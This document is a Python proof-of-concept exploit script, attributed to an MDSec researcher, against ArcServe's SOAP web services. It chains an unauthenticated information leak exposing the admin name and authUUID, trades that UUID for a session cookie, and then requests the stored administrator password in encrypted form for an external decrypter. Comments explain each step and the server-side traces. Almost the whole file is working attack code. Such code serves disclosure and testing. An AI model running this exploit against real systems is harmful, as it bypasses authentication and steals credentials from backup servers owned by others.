POC / ArcServe-exploit.py PY
#!/usr/bin/env python3

# ArcServe Exploit by Juan Manuel Fernandez (@TheXC3LL) - MDSec

import sys
import requests
import urllib3
import base64
# Every request in this script passes verify=False, so the server certificate
# is never validated; this call only hides the InsecureRequestWarning that
# urllib3 would otherwise print for each of those requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Module-level slot shared between steps: getUUID() writes the leaked admin
# name here and validate() prints it back.
adminname = ""

def getUUID(ip):
    """Call getVersionInfo on the agent and pull two fields out of the reply.

    The SOAP request is posted to FlashServiceImpl on port 8014 with no cookie
    or credentials attached, and the reply text is searched for
    <ns5:adminName> and <ns5:authUUID>. A reply that carries those elements to
    such a caller is the information leak the later steps build on. On the
    server side this step appears as a POST to
    /WebServiceImpl/services/FlashServiceImpl whose body names getVersionInfo.

    Side effect: stores the admin name in the module-level ``adminname``.
    Returns the text found between the authUUID tags.
    """
    global adminname

    def between(text, open_tag, close_tag):
        # Plain substring slicing, not XML parsing: if a tag is absent,
        # str.find() yields -1 and the slice returns unrelated text instead
        # of failing, so a reply without these fields is not detected here.
        return text[text.find(open_tag) + len(open_tag):text.find(close_tag)]

    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getVersionInfo xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"></ns2:getVersionInfo></S:Body></S:Envelope>'
    endpoint = 'https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl'
    # verify=False: the server certificate is not checked for this request.
    reply = requests.post(endpoint, data=payload, verify=False, allow_redirects=False)
    body = reply.text

    adminname = between(body, '<ns5:adminName>', '</ns5:adminName>')
    auth_uuid = between(body, '<ns5:authUUID>', '</ns5:authUUID>')
    print("\t[+] AdminName: " + adminname)
    print("\t[+] AuthUUID: " + auth_uuid)
    return auth_uuid

def getSession(ip, uuid):
    """Exchange an authUUID for a session cookie through validateUserByUUID.

    The UUID is concatenated, unescaped, into the <arg0> element of a SOAP
    request posted to VirtualStandbyServiceImpl on port 8014. Nothing else
    identifies the caller: the UUID value is the only credential presented.
    On the server side this step appears as a POST to
    /WebServiceImpl/services/VirtualStandbyServiceImpl whose body names
    validateUserByUUID.

    Returns the Set-Cookie text that precedes the first ';' when the service
    answers 200; for any other status the function returns None.
    """
    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUUID xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"><arg0>' + uuid + '</arg0></ns2:validateUserByUUID></S:Body></S:Envelope>'
    endpoint = 'https://' + ip + ':8014/WebServiceImpl/services/VirtualStandbyServiceImpl'
    # verify=False: the server certificate is not checked for this request.
    req = requests.post(endpoint, data=payload, verify=False, allow_redirects=False)
    output = req.text  # response body is read but not used by this step

    if req.status_code != 200:
        return None

    # A 200 reply without a Set-Cookie header raises KeyError here.
    set_cookie = req.headers["Set-Cookie"]
    # Keep everything before the first ';'. If the header has no ';',
    # find() gives -1 and the slice drops the final character.
    cut = set_cookie.find(";")
    session = set_cookie[:cut]
    print("\t[+] Session: " + session)
    return session

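def validate(ip, session):
    """Replay the session cookie against getLocalHostAsTrust and report the result.

    The cookie from getSession() is sent in a Cookie header with a SOAP
    request to FlashServiceImpl on port 8014. A 500 status is reported as an
    invalid session; every other status is reported as valid. When the reply
    holds a <ns5:password> element, its base64 content is decoded, the first
    0x80 bytes are discarded and the remaining bytes are printed as a
    comma-separated list of decimal values for a separate decrypter that is
    not part of this file.

    A reply that contains <ns5:password> means the service returned stored
    credential material to this session; on an affected host that credential
    should be treated as exposed.

    Prints its findings and returns None. Raises ValueError (binascii.Error)
    if the element cannot be base64-decoded with zero, one or two padding
    characters appended.
    """
    payload = '<?xml version=\'1.0\' encoding=\'UTF-8\'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getLocalHostAsTrust xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"></ns2:getLocalHostAsTrust></S:Body></S:Envelope>'
    headers = {'Cookie': session}
    # verify=False: the server certificate is not checked for this request.
    req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl', data=payload, headers=headers, verify=False, allow_redirects=False)

    # NOTE(review): only 500 counts as failure, so a redirect (redirects are
    # not followed) or a 4xx reply is also reported as a valid session.
    if req.status_code == 500:
        print("[!] Failed. Session is invalid :(")
        return

    print("[*] Session is valid")
    output = req.text

    print("\t[+] Admin: " + adminname)

    if output.find('<ns5:password>') == -1:
        print("\t[-] No password returned")
    else:
        encoded = output[output.find('<ns5:password>') + 14:output.find('</ns5:password>')]

        # Try the value as-is, then with one and two '=' appended. Only
        # decoding errors are retried (binascii.Error is a ValueError); the
        # original bare ``except:`` also swallowed KeyboardInterrupt and
        # SystemExit. A failure on the last attempt propagates, as before.
        decoded = None
        for padding in ("", "=", "=="):
            try:
                decoded = base64.b64decode(encoded + padding)
                break
            except ValueError:
                if padding == "==":
                    raise

        # Skip the first 0x80 bytes; the script gives no reason, presumably
        # a fixed-size header in front of the encrypted value.
        decoded = decoded[0x80:]
        final = [str(byte) for byte in decoded]
        print("\t[+] Password: {" + ', '.join(final) + "}; // Paste it to the decrypter")

    print("\n\nHave a happy hacking! ^_^")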


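if __name__ == '__main__':
    # Entry point. Takes exactly one argument (the host) and runs the three
    # steps in order: getUUID() -> getSession() -> validate().
    print("\t\t-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-\n\n")
    if len(sys.argv) != 2:
        print("[!] Error! Syntax: ArcPwn.py <IP>")
        # sys.exit rather than the site-provided exit(), which is meant for
        # the interactive interpreter and is absent under ``python -S``.
        sys.exit(-1)
    target = sys.argv[1]
    print("[*] Triggering info leak")
    uuid = getUUID(target)
    print("[*] Getting a valid session")
    session = getSession(target, uuid)
    if session is None:
        # getSession() returns None unless the service answered 200. Stop
        # here instead of calling validate() with no cookie, which would
        # test an unauthenticated request and could misreport the outcome.
        print("[!] Failed. No session was issued for the leaked UUID")
        sys.exit(1)
    print("[*] Doing an authenticated request to validate if session is valid")
    validate(target, session)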